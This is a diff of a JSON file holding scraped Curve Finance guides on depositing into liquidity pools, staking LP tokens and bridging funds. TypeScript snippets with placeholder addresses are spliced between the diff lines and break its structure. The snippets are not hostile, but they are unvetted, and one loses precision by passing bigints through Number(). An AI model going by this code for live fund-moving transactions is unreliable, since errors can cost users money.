For example, in the GUSD/3Pool Metapool you can deposit the following: GUSD Any of the 3Pool (DAI-USDC-USDT) 3Pool LP token (3crv) When becoming a liquidity provider, you don't have to deposit all the coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus. Second, once you deposit one stable coin, it gets split over the four different coins in the pool which means you now have exposure to all of them . The first checkbox (Add all coins in a balanced proportion) allows you to deposit all four coins in the same proportion they currently are in the pool, resulting in no slippage occurrence. The deposit wrapped option lets you deposit the base pool token (usually 3Pool). When depositing coins into a metapool, and thus having exposure to a base pool token (e.g., 3CRV) and its paired token, you will earn at the rate of the metapool gauge. However, you'll receive trading fees from both the base and metapool. Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will wrap your stable coins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. This second transaction will only pop up if you deposited your tokens under the \"Deposit and stake\" tab. Otherwise it will just deposit the tokens in the pool. If you already have LP tokens, you can also directly stake them into the gauge under the 'Stake' tab. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. 
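To make the single-sided deposit flow described above concrete, here is a minimal TypeScript sketch using ethers (v6). The addresses are placeholders and the two-slot ABI fragment is assumed from the typical Curve metapool layout (slot 0 = the paired token, slot 1 = the 3CRV base LP token); this illustrates the approve-then-add_liquidity sequence the UI performs, not a vetted integration.

```ts
import { ethers } from "ethers";

// Placeholder addresses -- substitute the real GUSD token and metapool.
const GUSD = "0x...";
const GUSD_METAPOOL = "0x...";

// Minimal ABI fragments (assumed from the common Curve metapool interface).
const erc20Abi = ["function approve(address spender, uint256 amount) returns (bool)"];
const poolAbi = ["function add_liquidity(uint256[2] amounts, uint256 min_mint_amount) returns (uint256)"];

async function depositGusd(signer: ethers.Signer, amount: bigint, minLp: bigint) {
  const gusd = new ethers.Contract(GUSD, erc20Abi, signer);
  const pool = new ethers.Contract(GUSD_METAPOOL, poolAbi, signer);

  // Step 1: the approval transaction the page asks you to confirm.
  await (await gusd.approve(GUSD_METAPOOL, amount)).wait();

  // Step 2: single-sided deposit -- GUSD in slot 0, zero 3CRV in slot 1.
  // minLp caps acceptable slippage; compute it off-chain before sending.
  await (await pool.add_liquidity([amount, 0n], minLp)).wait();
}
```

The same two-transaction pattern (approve, then deposit) applies whichever of the pool's coins you supply.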
You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO: Boosting your CRV Rewards Staking your $CRV 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Depositing into the susd pool", - "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-the-susd-pool/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the susd pool Table of contents Depositing into the sUSD Pool Depositing into the pool Confirming and staking Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Depositing into the sUSD Pool Depositing into the pool Confirming and staking Depositing into the susd pool Depositing into the sUSD Pool If youre wanting to figure out Curve, please read the starter guide . After reading this, you should have an understanding of how Curve works, how it makes money for liquidity providers and its risks which is ideally what you want before providing liquidity. Understanding Curve v1 Curve Finance sUSD pool has quickly become the biggest pool thanks to its SNX incentives which guarantee continuous returns to liquidity providers. The sUSD pool was born out of a partnership between Curve and Synthetix who sought to help bring stability to their stablecoin sUSD. The pool is not a lending pool which means your main APY only comes from trading fees. The pool has sUSD, DAI, USDC and USDT. Unlike Y pool, the sUSD pool is quite cheap to deposit in making it a good choice if you want to try Curve with a small amount. The current rewards have no expiry date but can be adjusted by a vote from Synthetix governance. Depositing into the pool Visit the deposit page ( https://www.curve.fi/susdv2/deposit ). You will need one or multiple stablecoins to deposit. The sUSD pool takes DAI, USDC, USDT and sUSD. First, it's important to understand that you don't have to deposit all coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus. Second, once you deposit one stable coin, it gets split over the four different coins in the pool which means you now have exposure to all of them . 
The first checkbox (Add all coins in a balanced proportion) allows you to deposit all four coins in the same proportion they currently are in the pool. If you don't want to add all your stablecoins, just click the \"Use maximum amount of coins available\" checkbox and enter the number of coins you wish to deposit and click \"Deposit and Stake\". Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will wrap your stablecoins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV and SNX . You can claim both those tokens from the minter gauge. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards. Last update: 2023-08-15 Back to top", + "title": "Depositing into a tricrypto-pool", + "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-a-tricrypto-pool/", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Depositing into a tricrypto-pool Table of contents Depositing into the pool Confirming and staking Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Depositing into the pool Confirming and staking Home Liquidity Providers Depositing Depositing into a tricrypto-pool Tricrypto pools contain three volatile assets. Learn more about v2 pools The TriCRV pool, for instance, is used in the examples below. Depositing into the pool Visit the deposit page ( https://curve.fi/#/ethereum/pools/factory-tricrypto-4/deposit ). You will need at least one of the three tokens in the pool to deposit. The TriCRV pool consists of CRV, crvUSD, and ETH. 
First, it's important to understand that you don't have to deposit all coins; you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small positive price impact. Since crypto pools have a rebalancing mechanism, the balances of the pool should be relatively equal. Second, once you deposit one coin, it gets split over the three different coins in the pool, which means you now have exposure to all of them. The first checkbox (Add all coins in a balanced proportion) allows you to deposit all three coins in the same proportion they currently are in the pool, resulting in no price impact. The second checkbox (Deposit Wrapped) allows users to deposit wrapped ETH instead of plain ETH. Confirming and staking You will then be asked to approve the Curve Finance contract, followed by a deposit transaction which will deposit your tokens into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. This second transaction will only pop up if you deposited your tokens under the \"Deposit and stake\" tab. Otherwise it will just deposit the tokens in the pool. If you already have LP tokens, you can also directly stake them into the gauge under the 'Stake' tab. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. 
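The 'Stake' tab flow mentioned above reduces to a gauge deposit. A minimal sketch, assuming the standard LiquidityGauge deposit(uint256) entry point and placeholder addresses for the pool's LP token and its gauge:

```ts
import { ethers } from "ethers";

// Placeholders -- substitute the pool's LP token and its DAO gauge.
const LP_TOKEN = "0x...";
const GAUGE = "0x...";

const erc20Abi = ["function approve(address spender, uint256 amount) returns (bool)"];
const gaugeAbi = ["function deposit(uint256 value)"];

// Stake already-held LP tokens into the gauge to start accruing CRV.
async function stakeLp(signer: ethers.Signer, amount: bigint) {
  const lp = new ethers.Contract(LP_TOKEN, erc20Abi, signer);
  const gauge = new ethers.Contract(GAUGE, gaugeAbi, signer);
  await (await lp.approve(GAUGE, amount)).wait(); // gauge pulls LP via transferFrom
  await (await gauge.deposit(amount)).wait();     // LP now earns gauge CRV emissions
}
```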
You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO: Boosting your CRV Rewards Staking your $CRV 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Depositing into the tri pool", - "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-the-tri-pool/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the tri pool Table of contents Depositing into the Tri-Pool Depositing into the pool Confirming and staking Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Depositing into the Tri-Pool Depositing into the pool Confirming and staking Depositing into the tri pool Depositing into the Tri-Pool The Tri-Pool is a classic Curve pool and improved upon earlier offerings in many ways. Here are some of the major improvements this pool: A new rampable A parameter (like on BTC pools) which can adjust liquidity density without causing losses to the virtual price (and to LPs) Gas optimised Will be used as a base pool for meta pools (which would essentially allow some pools to seemingly trade against underlying base pools without diluting liquidity) By only having the three most liquid stable coins in crypto, this pool should grow to become the most liquid and offer the best prices This pool is expected to become the most liquid and the cheapest to interact with making it a good place to start for newcomers wanting to try Curve with small amounts of capital. Because this pool is likely to offer the best prices, it will also likely be one of the Curve pools getting the most volume. See how to deposit and stake into the 3Pool: https://www.youtube.com/watch?v=OsRrGij9Ou8 Depositing into the pool Visit the deposit page ( https://www.curve.fi/3pool/deposit ). You will need one or multiple stable coins to deposit. The Tri-Pool takes DAI, USDC and USDT. First, it's important to understand that you don't have to deposit all coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus. Second, once you deposit one stable coin, it gets split over the three different coins in the pool which means you now have exposure to all of them . 
The first checkbox (Add all coins in a balanced proportion) allows you to deposit all four coins in the same proportion they currently are in the pool. If you don't want to add all your stable coins, just click the \"Use maximum amount of coins available\" checkbox and enter the number of coins you wish to deposit and click \"Deposit and Stake\". Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will wrap your stable coins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO. Boosting your CRV Rewards Last update: 2023-08-15 Back to top", + "title": "Depositing into the susd-pool", + "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-the-susd-pool/", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into the susd-pool Table of contents Depositing into the pool Confirming and staking Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Depositing into the pool Confirming and staking Home Liquidity Providers Depositing Depositing into the susd-pool If you're wanting to figure out Curve, please read the starter guide. After reading this, you should have an understanding of how Curve works, how it makes money for liquidity providers and its risks, which is ideally what you want to understand before providing liquidity. Understanding Curve v1 Curve Finance's sUSD pool has quickly become the biggest pool thanks to its SNX incentives which guarantee continuous returns to liquidity providers. 
The sUSD pool was born out of a partnership between Curve and Synthetix who sought to help bring stability to their stablecoin sUSD. The pool is not a lending pool which means your main APY only comes from trading fees. The pool has sUSD, DAI, USDC and USDT. Unlike Y pool, the sUSD pool is quite cheap to deposit in, making it a good choice if you want to try Curve with a small amount. The current rewards have no expiry date but can be adjusted by a vote from Synthetix governance. Depositing into the pool Visit the deposit page ( https://curve.fi/#/ethereum/pools/susd/deposit ). You will need one or multiple stablecoins to deposit. The sUSD pool takes DAI, USDC, USDT and sUSD. First, it's important to understand that you don't have to deposit all coins; you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus. Second, once you deposit one stable coin, it gets split over the four different coins in the pool, which means you now have exposure to all of them. The first checkbox (Add all coins in a balanced proportion) allows you to deposit all four coins in the same proportion they currently are in the pool, resulting in no slippage. Confirming and staking You will then be asked to approve the Curve Finance contract, followed by a deposit transaction which will wrap your stablecoins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV and SNX. This second transaction will only pop up if you deposited your tokens under the \"Deposit and stake\" tab. Otherwise it will just deposit the tokens in the pool. If you already have LP tokens, you can also directly stake them into the gauge under the 'Stake' tab. You can claim both those tokens from the minter gauge. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. 
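Claiming the accrued CRV and SNX can also be done directly against the contracts. A sketch assuming the standard Curve Minter mint(address) call for CRV and the claim_rewards() entry point that reward-bearing gauges expose for extra tokens such as SNX; both addresses are placeholders:

```ts
import { ethers } from "ethers";

const MINTER = "0x...";     // placeholder -- the Curve CRV Minter
const SUSD_GAUGE = "0x..."; // placeholder -- the sUSD pool gauge

const minterAbi = ["function mint(address gaugeAddr)"];
const gaugeAbi = ["function claim_rewards()"];

async function claimAll(signer: ethers.Signer) {
  const minter = new ethers.Contract(MINTER, minterAbi, signer);
  const gauge = new ethers.Contract(SUSD_GAUGE, gaugeAbi, signer);
  await (await minter.mint(SUSD_GAUGE)).wait(); // mints the CRV accrued in this gauge
  await (await gauge.claim_rewards()).wait();   // pays out extra rewards (e.g. SNX)
}
```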
You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO: Boosting your CRV Rewards Staking your $CRV 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Depositing into the y pool", - "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-the-y-pool/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Depositing into the y pool Table of contents Depositing into the Y Pool (deprecated) Depositing into the pool Confirming and staking Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Depositing into the Y Pool (deprecated) Depositing into the pool Confirming and staking Depositing into the y pool Depositing into the Y Pool (deprecated) Warning The content of this page is deprecated but it was maintained here to preserve history. If youre wanting to figure out Curve, please read the starter guide at this address . After reading this, you should have an understanding of how Curve works, how it makes money for liquidity providers and its risks which is ideally what you want before providing liquidity. Curve Finance Y pool has long been one of the most popular pools on Curve Finance due to its strong returns from trading fees supplemented by iEarn which also lends your stablecoin in the background to the lending protocol with the best lending rates out of dYdX and AAVE. Y pool also receives CRV rewards since its launch in early August. Now you know how the Y pool makes money for liquidity providers and you're ready to start providing liquidity. Depositing into the pool Visit the deposit page ( https://www.curve.fi/iearn/deposit ). You will need one or multiple stablecoins to deposit. The Y pool takes DAI, USDC, USDT and TUSD. First, it's important to understand that you don't have to deposit all coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus like seen on the screenshot above. Second, once you deposit one stable coin, it gets split over the four different coins in the pool which means you now have exposure to all of them . 
The first checkbox (Add all coins in a balanced proportion) allows you to deposit all four coins in the same proportion they currently are in the pool. The \"Deposit wrapped\" option allows you to directly deposit Y tokens that have been previously wrapped (on yEarn Finance website). If you are depositing a normal stable coin, you can ignore this option. If you don't want to add all your stablecoins, just click the \"Use maximum amount of coins available\" checkbox and enter the number of coins you wish to deposit and click \"Deposit and Stake\" . You will then be prompted to confirm multiple transactions. Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will wrap your stable coins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. You can claim them from the minter gauge. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards. Boosting your CRV Rewards Last update: 2023-08-15 Back to top", + "title": "Depositing into the tri-pool", + "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-the-tri-pool/", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into the tri-pool Table of contents Depositing into the pool Confirming and staking Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Depositing into the pool Confirming and staking Home Liquidity Providers Depositing Depositing into the tri-pool The Tri-Pool is a classic Curve pool that improved upon earlier offerings in many ways. 
Here are some of the major improvements of this pool: A new rampable A parameter (like on BTC pools) which can adjust liquidity density without causing losses to the virtual price (and to LPs) Gas optimised Will be used as a base pool for meta pools (which would essentially allow some pools to seemingly trade against underlying base pools without diluting liquidity) By only having the three most liquid stable coins in crypto, this pool should grow to become the most liquid and offer the best prices This pool is expected to become the most liquid and the cheapest to interact with making it a good place to start for newcomers wanting to try Curve with small amounts of capital. Because this pool is likely to offer the best prices, it will also likely be one of the Curve pools getting the most volume. See how to deposit and stake into the 3Pool: https://www.youtube.com/watch?v=OsRrGij9Ou8 Depositing into the pool Visit the deposit page ( https://curve.fi/#/ethereum/pools/3pool/deposit ). You will need one or multiple stable coins to deposit. The Tri-Pool takes DAI, USDC and USDT. First, it's important to understand that you don't have to deposit all coins; you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus. Second, once you deposit one stable coin, it gets split over the three different coins in the pool, which means you now have exposure to all of them. The first checkbox (Add all coins in a balanced proportion) allows you to deposit all three coins in the same proportion they currently are in the pool, resulting in no slippage. Confirming and staking You will then be asked to approve the Curve Finance contract, followed by a deposit transaction which will wrap your stable coins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. This second transaction will only pop up if you deposited your tokens under the \"Deposit and stake\" tab. Otherwise it will just deposit the tokens in the pool. If you already have LP tokens, you can also directly stake them into the gauge under the 'Stake' tab. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. 
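The "balanced proportion" checkbox simply splits a deposit pro rata over the pool's current balances. A sketch of that arithmetic, assuming the pool exposes balances(uint256) (some older pools index with int128) and normalizing for the coins' differing decimals (DAI uses 18, USDC and USDT use 6):

```ts
import { ethers } from "ethers";

const POOL = "0x..."; // placeholder -- the 3Pool address
const poolAbi = ["function balances(uint256 i) view returns (uint256)"];
const DECIMALS = [18, 6, 6]; // DAI, USDC, USDT

// Split `budget` (in dollars, treating each stablecoin as ~$1) across
// the three coins in the pool's current ratio.
async function balancedAmounts(provider: ethers.Provider, budget: number) {
  const pool = new ethers.Contract(POOL, poolAbi, provider);
  const raw = await Promise.all([0, 1, 2].map((i) => pool.balances(i)));
  const norm = raw.map((b, i) => Number(b) / 10 ** DECIMALS[i]); // whole coins
  const total = norm.reduce((a, b) => a + b, 0);
  return norm.map((b) => (budget * b) / total); // per-coin deposit amounts
}
```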
You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO: Boosting your CRV Rewards Staking your $CRV 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2106,15 +2130,15 @@ { "title": "Bridging funds", "html_url": "https://resources.curve.fi/multichain/bridging-funds/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Bridging funds Table of contents Bridging Funds $CRV Cross-Chain Important Bridges Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Bridging Funds $CRV Cross-Chain Important Bridges Bridging funds Bridging Funds In order to use Curve on chains other than Ethereum, you will need to bridge funds to the sidechain. Curve operates on several chains, documented here: Understanding Multichain Bridges are not operated by Curve, so Curve cannot offer support for using bridges. The following issues may affect users of bridges, so make sure to do research and exercise caution. Liquidity issues: Sometimes bridges do not have enough liquidity to process transactions. Usually the bridge will wait to refill liquidity before it permits funds getting processed. Stuck funds: Occasionally funds will get moved off one chain, but fail to appear on the new chain in a timely manner. Sometimes this gets resolved by simply waiting. In extreme cases, you should contact the support channels for the bridge in question. Hacking: Cross-chain communication can be complex, and the bridge is $CRV Cross-Chain The Curve token can be bridged across some chains, but does not always have full functionality. Staking of $CRV for veCRV must be done on Ethereum. Rewards voting for cross-chain gauges occurs on Ethereum. 
Important Bridges Arbitrum: https://bridge.arbitrum.io/ Fantom: Spookyswap: https://spookyswap.finance/bridge Polygon: https://wallet.polygon.technology/bridge/ xDai xDai Bridge: https://bridge.xdaichain.com/ Omni Bridge: https://omni.xdaichain.com/bridge Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Bridging funds Table of contents $CRV Cross-Chain Important Bridges Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents $CRV Cross-Chain Important Bridges Home Multi-Chain Bridging funds In order to use Curve on chains other than Ethereum, you will need to bridge funds to the sidechain. Curve operates on several chains, documented here: Understanding Multichain Bridges are not operated by Curve, so Curve cannot offer support for using bridges. The following issues may affect users of bridges, so make sure to do research and exercise caution. Liquidity issues: Sometimes bridges do not have enough liquidity to process transactions. Usually the bridge will wait to refill liquidity before it permits funds getting processed. Stuck funds: Occasionally funds will get moved off one chain, but fail to appear on the new chain in a timely manner. Sometimes this gets resolved by simply waiting. In extreme cases, you should contact the support channels for the bridge in question. Hacking: Cross-chain communication can be complex, and the bridge itself can be a target for attacks. $CRV Cross-Chain The Curve token can be bridged across some chains, but does not always have full functionality. Staking of $CRV for veCRV must be done on Ethereum. Rewards voting for cross-chain gauges occurs on Ethereum. Important Bridges MULTICHAIN WARNING Multichain statement: https://twitter.com/MultichainOrg/status/1677180114227056641 The Multichain service is currently stopped, and all bridge transactions will be stuck on the source chains. There is no confirmed resume time. Please don't use the Multichain bridging service now. 
